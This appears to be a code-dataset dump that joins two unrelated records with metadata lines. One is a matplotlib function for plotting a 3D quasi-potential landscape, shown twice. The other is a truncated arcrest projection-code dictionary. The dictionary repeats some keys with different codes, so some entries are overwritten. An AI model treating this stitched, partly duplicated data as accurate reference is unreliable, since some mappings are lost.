adata.uns["grid_Pot_" + basis]["Ygrid"], adata.uns["grid_Pot_" + basis]["Zgrid"], ) Xgrid = Xgrid_ if Xgrid is None else Xgrid Ygrid = Ygrid_ if Ygrid is None else Ygrid Zgrid = Zgrid_ if Zgrid is None else Zgrid from mpl_toolkits.mplot3d import Axes3D import matplotlib.pyplot as plt from matplotlib import cm from matplotlib.ticker import LinearLocator, FormatStrFormatter from matplotlib.colors import LightSource fig = plt.figure() ax = fig.gca(projection="3d") # Plot the surface. 
ls = LightSource(azdeg=0, altdeg=65) # Shade data, creating an rgb array. rgb = ls.shade(Zgrid, plt.cm.RdYlBu) surf = ax.plot_surface( Xgrid, Ygrid, Zgrid, cmap=cm.coolwarm, rstride=1, cstride=1, facecolors=rgb, linewidth=0, antialiased=False, ) # Customize the z axis. ax.zaxis.set_major_locator(LinearLocator(10)) ax.zaxis.set_major_formatter(FormatStrFormatter("%.02f")) # Add a color bar which maps values to colors. # fig.colorbar(surf, shrink=0.5, aspect=5) ax.set_xlabel(basis + "_1") ax.set_ylabel(basis + "_2") ax.set_zlabel("U") if save_show_or_return == "save": s_kwargs = {"path": None, "prefix": 'show_landscape', "dpi": None, "ext": 'pdf', "transparent": True, "close": True, "verbose": True} s_kwargs = update_dict(s_kwargs, save_kwargs) save_fig(**s_kwargs) elif save_show_or_return == "show": plt.tight_layout() plt.show() elif save_show_or_return == "return": return ax # show_pseudopot(Xgrid, Ygrid, Zgrid) # % %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% # % % -- Plot selected paths on pot. surface -- # % path_spacing = 4; # % hold on; # % for n_path = 1:numPaths # % if ( ((mod(x_path(n_path, 1), path_spacing) == 0) && (mod(y_path(n_path, 1), path_spacing) == 0)) ... # % || ((mod(y_path(n_path, 1), path_spacing) == 0) && (mod(x_path(n_path, 1), path_spacing) == 0)) ) # % # % % % *** To generate log-log surface *** # % % x_path(n_path, :) = x_path(n_path, :) + 0.1; # % % y_path(n_path, :) = y_path(n_path, :) + 0.1; # % % % *** # % # % if (path_tag(n_path) == 1) # % plot3(x_path(n_path, :), y_path(n_path, :), pot_path(n_path, :) ... # % , '-r' , 'MarkerSize', 1) % plot paths # % elseif (path_tag(n_path) == 2) # % plot3(x_path(n_path, :), y_path(n_path, :), pot_path(n_path, :) ... # % , '-b' , 'MarkerSize', 1) % plot paths # % elseif (path_tag(n_path) == 3) # % plot3(x_path(n_path, :), y_path(n_path, :), pot_path(n_path, :) ... # % , '-g' , 'MarkerSize', 1) % plot paths # % end # % hold on; # % # % end # % end
from ..tools.utils import update_dict from .utils import save_fig def show_landscape(adata, Xgrid, Ygrid, Zgrid, basis="umap", save_show_or_return='show', save_kwargs={}, ): """Plot the quasi-potential landscape. Parameters ---------- adata: :class:`~anndata.AnnData` AnnData object that contains Xgrid, Ygrid and Zgrid data for visualizing potential landscape. Xgrid: `numpy.ndarray` x-coordinates of the Grid produced from the meshgrid function. Ygrid: `numpy.ndarray` y-coordinates of the Grid produced from the meshgrid function. Zgrid: `numpy.ndarray` z-coordinates or potential at each of the x/y coordinate. basis: `str` (default: umap) The method of dimension reduction. By default it is trimap. Currently it is not checked with Xgrid and Ygrid. save_show_or_return: {'show', 'save', 'return'} (default: `show`) Whether to save, show or return the figure. save_kwargs: `dict` (default: `{}`) A dictionary that will passed to the save_fig function. By default it is an empty dictionary and the save_fig function will use the {"path": None, "prefix": 'show_landscape', "dpi": None, "ext": 'pdf', "transparent": True, "close": True, "verbose": True} as its parameters. Otherwise you can provide a dictionary that properly modify those keys according to your needs. Returns ------- A 3D plot showing the quasi-potential of each cell state. """ if "grid_Pot_" + basis in adata.uns.keys(): Xgrid_, Ygrid_, Zgrid_ = ( adata.uns["grid_Pot_" + basis]["Xgrid"], adata.uns["grid_Pot_" + basis]["Ygrid"], adata.uns["grid_Pot_" + basis]["Zgrid"], ) Xgrid = Xgrid_ if Xgrid is None else Xgrid Ygrid = Ygrid_ if Ygrid is None else Ygrid Zgrid = Zgrid_ if Zgrid is None else Zgrid from mpl_toolkits.mplot3d import Axes3D import matplotlib.pyplot as plt from matplotlib import cm from matplotlib.ticker import LinearLocator, FormatStrFormatter from matplotlib.colors import LightSource fig = plt.figure() ax = fig.gca(projection="3d") # Plot the surface. 
ls = LightSource(azdeg=0, altdeg=65) # Shade data, creating an rgb array. rgb = ls.shade(Zgrid, plt.cm.RdYlBu) surf = ax.plot_surface( Xgrid, Ygrid, Zgrid, cmap=cm.coolwarm, rstride=1, cstride=1, facecolors=rgb, linewidth=0, antialiased=False, ) # Customize the z axis. ax.zaxis.set_major_locator(LinearLocator(10)) ax.zaxis.set_major_formatter(FormatStrFormatter("%.02f")) # Add a color bar which maps values to colors. # fig.colorbar(surf, shrink=0.5, aspect=5) ax.set_xlabel(basis + "_1") ax.set_ylabel(basis + "_2") ax.set_zlabel("U") if save_show_or_return == "save": s_kwargs = {"path": None, "prefix": 'show_landscape', "dpi": None, "ext": 'pdf', "transparent": True, "close": True, "verbose": True} s_kwargs = update_dict(s_kwargs, save_kwargs) save_fig(**s_kwargs) elif save_show_or_return == "show": plt.tight_layout() plt.show() elif save_show_or_return == "return": return ax # show_pseudopot(Xgrid, Ygrid, Zgrid) # % %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% # % % -- Plot selected paths on pot. surface -- # % path_spacing = 4; # % hold on; # % for n_path = 1:numPaths # % if ( ((mod(x_path(n_path, 1), path_spacing) == 0) && (mod(y_path(n_path, 1), path_spacing) == 0)) ... # % || ((mod(y_path(n_path, 1), path_spacing) == 0) && (mod(x_path(n_path, 1), path_spacing) == 0)) ) # % # % % % *** To generate log-log surface *** # % % x_path(n_path, :) = x_path(n_path, :) + 0.1; # % % y_path(n_path, :) = y_path(n_path, :) + 0.1; # % % % *** # % # % if (path_tag(n_path) == 1) # % plot3(x_path(n_path, :), y_path(n_path, :), pot_path(n_path, :) ... # % , '-r' , 'MarkerSize', 1) % plot paths # % elseif (path_tag(n_path) == 2) # % plot3(x_path(n_path, :), y_path(n_path, :), pot_path(n_path, :) ... # % , '-b' , 'MarkerSize', 1) % plot paths # % elseif (path_tag(n_path) == 3) # % plot3(x_path(n_path, :), y_path(n_path, :), pot_path(n_path, :) ... # % , '-g' , 'MarkerSize', 1) % plot paths # % end # % hold on; # % # % end # % end
en
0.585851
Plot the quasi-potential landscape. Parameters ---------- adata: :class:`~anndata.AnnData` AnnData object that contains Xgrid, Ygrid and Zgrid data for visualizing potential landscape. Xgrid: `numpy.ndarray` x-coordinates of the Grid produced from the meshgrid function. Ygrid: `numpy.ndarray` y-coordinates of the Grid produced from the meshgrid function. Zgrid: `numpy.ndarray` z-coordinates or potential at each of the x/y coordinate. basis: `str` (default: umap) The method of dimension reduction. By default it is trimap. Currently it is not checked with Xgrid and Ygrid. save_show_or_return: {'show', 'save', 'return'} (default: `show`) Whether to save, show or return the figure. save_kwargs: `dict` (default: `{}`) A dictionary that will passed to the save_fig function. By default it is an empty dictionary and the save_fig function will use the {"path": None, "prefix": 'show_landscape', "dpi": None, "ext": 'pdf', "transparent": True, "close": True, "verbose": True} as its parameters. Otherwise you can provide a dictionary that properly modify those keys according to your needs. Returns ------- A 3D plot showing the quasi-potential of each cell state. # Plot the surface. # Shade data, creating an rgb array. # Customize the z axis. # Add a color bar which maps values to colors. # fig.colorbar(surf, shrink=0.5, aspect=5) # show_pseudopot(Xgrid, Ygrid, Zgrid) # % %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% # % % -- Plot selected paths on pot. surface -- # % path_spacing = 4; # % hold on; # % for n_path = 1:numPaths # % if ( ((mod(x_path(n_path, 1), path_spacing) == 0) && (mod(y_path(n_path, 1), path_spacing) == 0)) ... 
# % || ((mod(y_path(n_path, 1), path_spacing) == 0) && (mod(x_path(n_path, 1), path_spacing) == 0)) ) # % # % % % *** To generate log-log surface *** # % % x_path(n_path, :) = x_path(n_path, :) + 0.1; # % % y_path(n_path, :) = y_path(n_path, :) + 0.1; # % % % *** # % # % if (path_tag(n_path) == 1) # % plot3(x_path(n_path, :), y_path(n_path, :), pot_path(n_path, :) ... # % , '-r' , 'MarkerSize', 1) % plot paths # % elseif (path_tag(n_path) == 2) # % plot3(x_path(n_path, :), y_path(n_path, :), pot_path(n_path, :) ... # % , '-b' , 'MarkerSize', 1) % plot paths # % elseif (path_tag(n_path) == 3) # % plot3(x_path(n_path, :), y_path(n_path, :), pot_path(n_path, :) ... # % , '-g' , 'MarkerSize', 1) % plot paths # % end # % hold on; # % # % end # % end
2.634554
3
arcrest/projections.py
Esri/arcpy-server-util-rest
10
6627882
import os class Projection(object): def __init__(self): self._name_mapping = {} for key, val in self._projections.items(): self._name_mapping[int(val)] = key setattr(self, key.replace('-', '_'), val) def __getitem__(self, index): return self._name_mapping[int(index)] def __contains__(self, index): return index in self._name_mapping class projected(Projection): _projections = { 'Anguilla_1957_British_West_Indies_Grid': 2000, 'Antigua_1943_British_West_Indies_Grid': 2001, 'Dominica_1945_British_West_Indies_Grid': 2002, 'Grenada_1953_British_West_Indies_Grid': 2003, 'Montserrat_1958_British_West_Indies_Grid': 2004, 'St_Kitts_1955_British_West_Indies_Grid': 2005, 'St_Lucia_1955_British_West_Indies_Grid': 2006, 'St_Vincent_1945_British_West_Indies_Grid': 2007, 'NAD_1927_CGQ77_MTM_2_SCoPQ': 2008, 'NAD_1927_CGQ77_MTM_3_SCoPQ': 2009, 'NAD_1927_CGQ77_MTM_4_SCoPQ': 2010, 'NAD_1927_CGQ77_MTM_5_SCoPQ': 2011, 'NAD_1927_CGQ77_MTM_6_SCoPQ': 2012, 'NAD_1927_CGQ77_MTM_7_SCoPQ': 2013, 'NAD_1927_CGQ77_MTM_8_SCoPQ': 2014, 'NAD_1927_CGQ77_MTM_9_SCoPQ': 2015, 'NAD_1927_CGQ77_MTM_10_SCoPQ': 2016, 'NAD_1927_DEF_1976_MTM_8': 2017, 'NAD_1927_DEF_1976_MTM_9': 2018, 'NAD_1927_DEF_1976_MTM_10': 2019, 'NAD_1927_DEF_1976_MTM_11': 2020, 'NAD_1927_DEF_1976_MTM_12': 2021, 'NAD_1927_DEF_1976_MTM_13': 2022, 'NAD_1927_DEF_1976_MTM_14': 2023, 'NAD_1927_DEF_1976_MTM_15': 2024, 'NAD_1927_DEF_1976_MTM_16': 2025, 'NAD_1927_DEF_1976_MTM_17': 2026, 'NAD_1927_DEF_1976_UTM_Zone_15N': 2027, 'NAD_1927_DEF_1976_UTM_Zone_16N': 2028, 'NAD_1927_DEF_1976_UTM_Zone_17N': 2029, 'NAD_1927_DEF_1976_UTM_Zone_18N': 2030, 'NAD_1927_CGQ77_UTM_Zone_17N': 2031, 'NAD_1927_CGQ77_UTM_Zone_18N': 2032, 'NAD_1927_CGQ77_UTM_Zone_19N': 2033, 'NAD_1927_CGQ77_UTM_Zone_20N': 2034, 'NAD_1927_CGQ77_UTM_Zone_21N': 2035, 'NAD_1983_CSRS_New_Brunswick_Stereographic': 2036, 'NAD_1983_CSRS_UTM_Zone_19N': 2037, 'NAD_1983_CSRS_UTM_Zone_20N': 2038, 'Israel_TM_Grid': 2039, 'Locodjo_1965_UTM_Zone_30N': 2040, 'Abidjan_1987_UTM_Zone_30N': 2041, 
'Locodjo_1965_UTM_Zone_29N': 2042, 'Abidjan_1987_UTM_Zone_29N': 2043, 'Hanoi_1972_GK_Zone_18': 2044, 'Hanoi_1972_GK_Zone_19': 2045, 'CH1903+_LV95': 2056, 'Rassadiran_Nakhl_e_Taqi': 2057, 'ED_1950_ED77_UTM_Zone_38N': 2058, 'ED_1950_ED77_UTM_Zone_39N': 2059, 'ED_1950_ED77_UTM_Zone_40N': 2060, 'ED_1950_ED77_UTM_Zone_41N': 2061, 'Madrid_1870_Madrid_Spain': 2062, 'Dabola_1981_UTM_Zone_28N': 2063, 'Dabola_1981_UTM_Zone_29N': 2064, 'S-JTSK_Ferro_Krovak': 2065, 'Mount_Dillon_Tobago_Grid': 2066, 'Naparima_1955_UTM_Zone_20N': 2067, 'ELD_1979_Libya_5': 2068, 'ELD_1979_Libya_6': 2069, 'ELD_1979_Libya_7': 2070, 'ELD_1979_Libya_8': 2071, 'ELD_1979_Libya_9': 2072, 'ELD_1979_Libya_10': 2073, 'ELD_1979_Libya_11': 2074, 'ELD_1979_Libya_12': 2075, 'ELD_1979_Libya_13': 2076, 'ELD_1979_UTM_Zone_32N': 2077, 'ELD_1979_UTM_Zone_33N': 2078, 'ELD_1979_UTM_Zone_34N': 2079, 'ELD_1979_UTM_Zone_35N': 2080, 'Chos_Malal_1914_Argentina_2': 2081, 'Pampa_del_Castillo_Argentina_2': 2082, 'Hito_XVIII_1963_Argentina_2': 2083, 'Hito_XVIII_1963_UTM_19S': 2084, 'NAD_1927_Cuba_Norte': 2085, 'NAD_1927_Cuba_Sur': 2086, 'ELD_1979_TM_12_NE': 2087, 'Carthage_TM_11_NE': 2088, 'Yemen_NGN_1996_UTM_Zone_38N': 2089, 'Yemen_NGN_1996_UTM_Zone_39N': 2090, 'South_Yemen_GK_Zone_8': 2091, 'South_Yemen_GK_Zone_9': 2092, 'Hanoi_1972_GK_106_NE': 2093, 'WGS_1972_BE_TM_106_NE': 2094, 'Bissau_UTM_Zone_28N': 2095, 'Korean_1985_Korea_East_Belt': 2096, 'Korean_1985_Korea_Central_Belt': 2097, 'Korean_1985_Korea_West_Belt': 2098, 'Qatar_1948_Qatar_Grid': 2099, 'Greek_Grid': 2100, 'Lake_Maracaibo_Grid_M1': 2101, 'Lake_Maracaibo_Grid': 2102, 'Lake_Maracaibo_Grid_M3': 2103, 'Lake_Maracaibo_La_Rosa_Grid': 2104, 'NZGD_2000_Mount_Eden_Circuit': 2105, 'NZGD_2000_Bay_of_Plenty_Circuit': 2106, 'NZGD_2000_Poverty_Bay_Circuit': 2107, 'NZGD_2000_Hawkes_Bay_Circuit': 2108, 'NZGD_2000_Taranaki_Circuit': 2109, 'NZGD_2000_Tuhirangi_Circuit': 2110, 'NZGD_2000_Wanganui_Circuit': 2111, 'NZGD_2000_Wairarapa_Circuit': 2112, 
'NZGD_2000_Wellington_Circuit': 2113, 'NZGD_2000_Collingwood_Circuit': 2114, 'NZGD_2000_Nelson_Circuit': 2115, 'NZGD_2000_Karamea_Circuit': 2116, 'NZGD_2000_Buller_Circuit': 2117, 'NZGD_2000_Grey_Circuit': 2118, 'NZGD_2000_Amuri_Circuit': 2119, 'NZGD_2000_Marlborough_Circuit': 2120, 'NZGD_2000_Hokitika_Circuit': 2121, 'NZGD_2000_Okarito_Circuit': 2122, 'NZGD_2000_Jacksons_Bay_Circuit': 2123, 'NZGD_2000_Mount_Pleasant_Circuit': 2124, 'NZGD_2000_Gawler_Circuit': 2125, 'NZGD_2000_Timaru_Circuit': 2126, 'NZGD_2000_Lindis_Peak_Circuit': 2127, 'NZGD_2000_Mount_Nicholas_Circuit': 2128, 'NZGD_2000_Mount_York_Circuit': 2129, 'NZGD_2000_Observation_Point_Circuit': 2130, 'NZGD_2000_North_Taieri_Circuit': 2131, 'NZGD_2000_Bluff_Circuit': 2132, 'NZGD_2000_UTM_Zone_58S': 2133, 'NZGD_2000_UTM_Zone_59S': 2134, 'NZGD_2000_UTM_Zone_60S': 2135, 'Accra_Ghana_Grid': 2136, 'Accra_TM_1_NW': 2137, 'NAD_1927_CGQ77_Quebec_Lambert': 2138, 'NAD_1983_CSRS_MTM_2_SCoPQ': 2139, 'NAD_1983_CSRS_MTM_3': 2140, 'NAD_1983_CSRS_MTM_4': 2141, 'NAD_1983_CSRS_MTM_5': 2142, 'NAD_1983_CSRS_MTM_6': 2143, 'NAD_1983_CSRS_MTM_7': 2144, 'NAD_1983_CSRS_MTM_8': 2145, 'NAD_1983_CSRS_MTM_9': 2146, 'NAD_1983_CSRS_MTM_10': 2147, 'NAD_1983_CSRS_UTM_Zone_21N': 2148, 'NAD_1983_CSRS_UTM_Zone_18N': 2149, 'NAD_1983_CSRS_UTM_Zone_17N': 2150, 'NAD_1983_CSRS_UTM_Zone_13N': 2151, 'NAD_1983_CSRS_UTM_Zone_12N': 2152, 'NAD_1983_CSRS_UTM_Zone_11N': 2153, 'RGF_1993_Lambert_93': 2154, 'Samoa_1962_Samoa_Lambert': 2155, 'IRENET95_Irish_Transverse_Mercator': 2157, 'IRENET95_UTM_Zone_29N': 2158, 'Sierra_Leone_1924_New_Colony_Grid': 2159, 'Sierra_Leone_1924_New_War_Office_Grid': 2160, 'Sierra_Leone_1968_UTM_Zone_28N': 2161, 'Sierra_Leone_1968_UTM_Zone_29N': 2162, 'US_National_Atlas_Equal_Area': 2163, 'Locodjo_1965_TM_5_NW': 2164, 'Abidjan_1987_TM_5_NW': 2165, 'Pulkovo_1942_Adj_1983_3_Degree_GK_Zone_3': 2166, 'Pulkovo_1942_Adj_1983_3_Degree_GK_Zone_4': 2167, 'Pulkovo_1942_Adj_1983_3_Degree_GK_Zone_5': 2168, 'Luxembourg_1930_Gauss': 2169, 
'MGI_Slovenia_Grid': 2170, 'Pulkovo_1942_Adj_1958_Poland_Zone_II': 2172, 'Pulkovo_1942_Adj_1958_Poland_Zone_III': 2173, 'Pulkovo_1942_Adj_1958_Poland_Zone_IV': 2174, 'Pulkovo_1942_Adj_1958_Poland_Zone_V': 2175, 'ETRS_1989_Poland_CS2000_Zone_5': 2176, 'ETRS_1989_Poland_CS2000_Zone_6': 2177, 'ETRS_1989_Poland_CS2000_Zone_7': 2178, 'ETRS_1989_Poland_CS2000_Zone_8': 2179, 'ETRS_1989_Poland_CS92': 2180, 'ED_1950_Turkey_9': 2181, 'ED_1950_Turkey_10': 2182, 'ED_1950_Turkey_11': 2183, 'ED_1950_Turkey_12': 2184, 'ED_1950_Turkey_13': 2185, 'ED_1950_Turkey_14': 2186, 'ED_1950_Turkey_15': 2187, 'Azores_Occidental_1939_UTM_Zone_25N': 2188, 'Azores_Central_1948_UTM_Zone_26N': 2189, 'Azores_Oriental_1940_UTM_Zone_26N': 2190, 'ED_1950_France_EuroLambert': 2192, 'NZGD_2000_New_Zealand_Transverse_Mercator': 2193, 'NAD_1983_HARN_UTM_Zone_2S': 2195, 'ETRS_1989_Kp2000_Jutland': 2196, 'ETRS_1989_Kp2000_Zealand': 2197, 'ETRS_1989_Kp2000_Bornholm': 2198, 'ATS_1977_New_Brunswick_Stereographic': 2200, 'REGVEN_UTM_Zone_18N': 2201, 'REGVEN_UTM_Zone_19N': 2202, 'REGVEN_UTM_Zone_20N': 2203, 'NAD_1927_StatePlane_Tennessee_FIPS_4100': 2204, 'NAD_1983_StatePlane_Kentucky_North_FIPS_1601': 2205, 'ED_1950_3_Degree_GK_Zone_9': 2206, 'ED_1950_3_Degree_GK_Zone_10': 2207, 'ED_1950_3_Degree_GK_Zone_11': 2208, 'ED_1950_3_Degree_GK_Zone_12': 2209, 'ED_1950_3_Degree_GK_Zone_13': 2210, 'ED_1950_3_Degree_GK_Zone_14': 2211, 'ED_1950_3_Degree_GK_Zone_15': 2212, 'ETRS_1989_TM_30_NE': 2213, 'Douala_1948_AEF_West': 2214, 'Manoca_1962_UTM_Zone_32N': 2215, 'Qornoq_1927_UTM_Zone_22N': 2216, 'Qornoq_1927_UTM_Zone_23N': 2217, 'ATS_1977_UTM_Zone_19N': 2219, 'ATS_1977_UTM_Zone_20N': 2220, 'NAD_1983_StatePlane_Arizona_East_FIPS_0201_Feet_Intl': 2222, 'NAD_1983_StatePlane_Arizona_Central_FIPS_0202_Feet_Intl': 2223, 'NAD_1983_StatePlane_Arizona_West_FIPS_0203_Feet_Intl': 2224, 'NAD_1983_StatePlane_California_I_FIPS_0401_Feet': 2225, 'NAD_1983_StatePlane_California_II_FIPS_0402_Feet': 2226, 
'NAD_1983_StatePlane_California_III_FIPS_0403_Feet': 2227, 'NAD_1983_StatePlane_California_IV_FIPS_0404_Feet': 2228, 'NAD_1983_StatePlane_California_V_FIPS_0405_Feet': 2229, 'NAD_1983_StatePlane_California_VI_FIPS_0406_Feet': 2230, 'NAD_1983_StatePlane_Colorado_North_FIPS_0501_Feet': 2231, 'NAD_1983_StatePlane_Colorado_Central_FIPS_0502_Feet': 2232, 'NAD_1983_StatePlane_Colorado_South_FIPS_0503_Feet': 2233, 'NAD_1983_StatePlane_Connecticut_FIPS_0600_Feet': 2234, 'NAD_1983_StatePlane_Delaware_FIPS_0700_Feet': 2235, 'NAD_1983_StatePlane_Florida_East_FIPS_0901_Feet': 2236, 'NAD_1983_StatePlane_Florida_West_FIPS_0902_Feet': 2237, 'NAD_1983_StatePlane_Florida_North_FIPS_0903_Feet': 2238, 'NAD_1983_StatePlane_Georgia_East_FIPS_1001_Feet': 2239, 'NAD_1983_StatePlane_Georgia_West_FIPS_1002_Feet': 2240, 'NAD_1983_StatePlane_Idaho_East_FIPS_1101_Feet': 2241, 'NAD_1983_StatePlane_Idaho_Central_FIPS_1102_Feet': 2242, 'NAD_1983_StatePlane_Idaho_West_FIPS_1103_Feet': 2243, 'NAD_1983_StatePlane_Indiana_East_FIPS_1301_Feet': 2244, 'NAD_1983_StatePlane_Indiana_West_FIPS_1302_Feet': 2245, 'NAD_1983_StatePlane_Kentucky_North_FIPS_1601_Feet': 2246, 'NAD_1983_StatePlane_Kentucky_South_FIPS_1602_Feet': 2247, 'NAD_1983_StatePlane_Maryland_FIPS_1900_Feet': 2248, 'NAD_1983_StatePlane_Massachusetts_Mainland_FIPS_2001_Feet': 2249, 'NAD_1983_StatePlane_Massachusetts_Island_FIPS_2002_Feet': 2250, 'NAD_1983_StatePlane_Michigan_North_FIPS_2111_Feet_Intl': 2251, 'NAD_1983_StatePlane_Michigan_Central_FIPS_2112_Feet_Intl': 2252, 'NAD_1983_StatePlane_Michigan_South_FIPS_2113_Feet_Intl': 2253, 'NAD_1983_StatePlane_Mississippi_East_FIPS_2301_Feet': 2254, 'NAD_1983_StatePlane_Mississippi_West_FIPS_2302_Feet': 2255, 'NAD_1983_StatePlane_Montana_FIPS_2500_Feet_Intl': 2256, 'NAD_1983_StatePlane_New_Mexico_East_FIPS_3001_Feet': 2257, 'NAD_1983_StatePlane_New_Mexico_Central_FIPS_3002_Feet': 2258, 'NAD_1983_StatePlane_New_Mexico_West_FIPS_3003_Feet': 2259, 'NAD_1983_StatePlane_New_York_East_FIPS_3101_Feet': 
2260, 'NAD_1983_StatePlane_New_York_Central_FIPS_3102_Feet': 2261, 'NAD_1983_StatePlane_New_York_West_FIPS_3103_Feet': 2262, 'NAD_1983_StatePlane_New_York_Long_Island_FIPS_3104_Feet': 2263, 'NAD_1983_StatePlane_North_Carolina_FIPS_3200_Feet': 2264, 'NAD_1983_StatePlane_North_Dakota_North_FIPS_3301_Feet_Intl': 2265, 'NAD_1983_StatePlane_North_Dakota_South_FIPS_3302_Feet_Intl': 2266, 'NAD_1983_StatePlane_Oklahoma_North_FIPS_3501_Feet': 2267, 'NAD_1983_StatePlane_Oklahoma_South_FIPS_3502_Feet': 2268, 'NAD_1983_StatePlane_Oregon_North_FIPS_3601_Feet_Intl': 2269, 'NAD_1983_StatePlane_Oregon_South_FIPS_3602_Feet_Intl': 2270, 'NAD_1983_StatePlane_Pennsylvania_North_FIPS_3701_Feet': 2271, 'NAD_1983_StatePlane_Pennsylvania_South_FIPS_3702_Feet': 2272, 'NAD_1983_StatePlane_South_Carolina_FIPS_3900_Feet_Intl': 2273, 'NAD_1983_StatePlane_Tennessee_FIPS_4100_Feet': 2274, 'NAD_1983_StatePlane_Texas_North_FIPS_4201_Feet': 2275, 'NAD_1983_StatePlane_Texas_North_Central_FIPS_4202_Feet': 2276, 'NAD_1983_StatePlane_Texas_Central_FIPS_4203_Feet': 2277, 'NAD_1983_StatePlane_Texas_South_Central_FIPS_4204_Feet': 2278, 'NAD_1983_StatePlane_Texas_South_FIPS_4205_Feet': 2279, 'NAD_1983_StatePlane_Utah_North_FIPS_4301_Feet_Intl': 2280, 'NAD_1983_StatePlane_Utah_Central_FIPS_4302_Feet_Intl': 2281, 'NAD_1983_StatePlane_Utah_South_FIPS_4303_Feet_Intl': 2282, 'NAD_1983_StatePlane_Virginia_North_FIPS_4501_Feet': 2283, 'NAD_1983_StatePlane_Virginia_South_FIPS_4502_Feet': 2284, 'NAD_1983_StatePlane_Washington_North_FIPS_4601_Feet': 2285, 'NAD_1983_StatePlane_Washington_South_FIPS_4602_Feet': 2286, 'NAD_1983_StatePlane_Wisconsin_North_FIPS_4801_Feet': 2287, 'NAD_1983_StatePlane_Wisconsin_Central_FIPS_4802_Feet': 2288, 'NAD_1983_StatePlane_Wisconsin_South_FIPS_4803_Feet': 2289, 'Prince_Edward_Island_Stereographic': 2290, 'NAD_1983_CSRS_Prince_Edward_Island': 2291, 'NAD_1983_CSRS_Prince_Edward_Island': 2292, 'ATS_1977_MTM_4_Nova_Scotia': 2294, 'ATS_1977_MTM_5_Nova_Scotia': 2295, 'Batavia_TM_109_SE': 
2308, 'WGS_1984_TM_116_SE': 2309, 'WGS_1984_TM_132_SE': 2310, 'WGS_1984_TM_6_NE': 2311, 'Garoua_UTM_Zone_33N': 2312, 'Kousseri_UTM_Zone_33N': 2313, 'Trinidad_1903_Trinidad_Grid_Feet_Clarke': 2314, 'Campo_Inchauspe_UTM_19S': 2315, 'Campo_Inchauspe_UTM_20S': 2316, 'PSAD_1956_ICN_Regional': 2317, 'Ain_el_Abd_Aramco_Lambert': 2318, 'ED_1950_TM27': 2319, 'ED_1950_TM30': 2320, 'ED_1950_TM33': 2321, 'ED_1950_TM36': 2322, 'ED_1950_TM39': 2323, 'ED_1950_TM42': 2324, 'ED_1950_TM45': 2325, 'Hong_Kong_1980_Grid': 2326, 'Xian_1980_GK_Zone_13': 2327, 'Xian_1980_GK_Zone_14': 2328, 'Xian_1980_GK_Zone_15': 2329, 'Xian_1980_GK_Zone_16': 2330, 'Xian_1980_GK_Zone_17': 2331, 'Xian_1980_GK_Zone_18': 2332, 'Xian_1980_GK_Zone_19': 2333, 'Xian_1980_GK_Zone_20': 2334, 'Xian_1980_GK_Zone_21': 2335, 'Xian_1980_GK_Zone_22': 2336, 'Xian_1980_GK_Zone_23': 2337, 'Xian_1980_GK_CM_75E': 2338, 'Xian_1980_GK_CM_81E': 2339, 'Xian_1980_GK_CM_87E': 2340, 'Xian_1980_GK_CM_93E': 2341, 'Xian_1980_GK_CM_99E': 2342, 'Xian_1980_GK_CM_105E': 2343, 'Xian_1980_GK_CM_111E': 2344, 'Xian_1980_GK_CM_117E': 2345, 'Xian_1980_GK_CM_123E': 2346, 'Xian_1980_GK_CM_129E': 2347, 'Xian_1980_GK_CM_135E': 2348, 'Xian_1980_3_Degree_GK_Zone_25': 2349, 'Xian_1980_3_Degree_GK_Zone_26': 2350, 'Xian_1980_3_Degree_GK_Zone_27': 2351, 'Xian_1980_3_Degree_GK_Zone_28': 2352, 'Xian_1980_3_Degree_GK_Zone_29': 2353, 'Xian_1980_3_Degree_GK_Zone_30': 2354, 'Xian_1980_3_Degree_GK_Zone_31': 2355, 'Xian_1980_3_Degree_GK_Zone_32': 2356, 'Xian_1980_3_Degree_GK_Zone_33': 2357, 'Xian_1980_3_Degree_GK_Zone_34': 2358, 'Xian_1980_3_Degree_GK_Zone_35': 2359, 'Xian_1980_3_Degree_GK_Zone_36': 2360, 'Xian_1980_3_Degree_GK_Zone_37': 2361, 'Xian_1980_3_Degree_GK_Zone_38': 2362, 'Xian_1980_3_Degree_GK_Zone_39': 2363, 'Xian_1980_3_Degree_GK_Zone_40': 2364, 'Xian_1980_3_Degree_GK_Zone_41': 2365, 'Xian_1980_3_Degree_GK_Zone_42': 2366, 'Xian_1980_3_Degree_GK_Zone_43': 2367, 'Xian_1980_3_Degree_GK_Zone_44': 2368, 'Xian_1980_3_Degree_GK_Zone_45': 2369, 
'Xian_1980_3_Degree_GK_CM_75E': 2370, 'Xian_1980_3_Degree_GK_CM_78E': 2371, 'Xian_1980_3_Degree_GK_CM_81E': 2372, 'Xian_1980_3_Degree_GK_CM_84E': 2373, 'Xian_1980_3_Degree_GK_CM_87E': 2374, 'Xian_1980_3_Degree_GK_CM_90E': 2375, 'Xian_1980_3_Degree_GK_CM_93E': 2376, 'Xian_1980_3_Degree_GK_CM_96E': 2377, 'Xian_1980_3_Degree_GK_CM_99E': 2378, 'Xian_1980_3_Degree_GK_CM_102E': 2379, 'Xian_1980_3_Degree_GK_CM_105E': 2380, 'Xian_1980_3_Degree_GK_CM_108E': 2381, 'Xian_1980_3_Degree_GK_CM_111E': 2382, 'Xian_1980_3_Degree_GK_CM_114E': 2383, 'Xian_1980_3_Degree_GK_CM_117E': 2384, 'Xian_1980_3_Degree_GK_CM_120E': 2385, 'Xian_1980_3_Degree_GK_CM_123E': 2386, 'Xian_1980_3_Degree_GK_CM_126E': 2387, 'Xian_1980_3_Degree_GK_CM_129E': 2388, 'Xian_1980_3_Degree_GK_CM_132E': 2389, 'Xian_1980_3_Degree_GK_CM_135E': 2390, 'Finland_Zone_1': 2391, 'Finland_Zone_2': 2392, 'Finland_Zone_3': 2393, 'Finland_Zone_4': 2394, 'South_Yemen_GK_Zone_8': 2395, 'South_Yemen_GK_Zone_9': 2396, 'Pulkovo_1942_Adj_1983_3_Degree_GK_Zone_3': 2397, 'Pulkovo_1942_Adj_1983_3_Degree_GK_Zone_4': 2398, 'Pulkovo_1942_Adj_1983_3_Degree_GK_Zone_5': 2399, 'RT90_25_gon_W': 2400, 'Beijing_1954_3_Degree_GK_Zone_25': 2401, 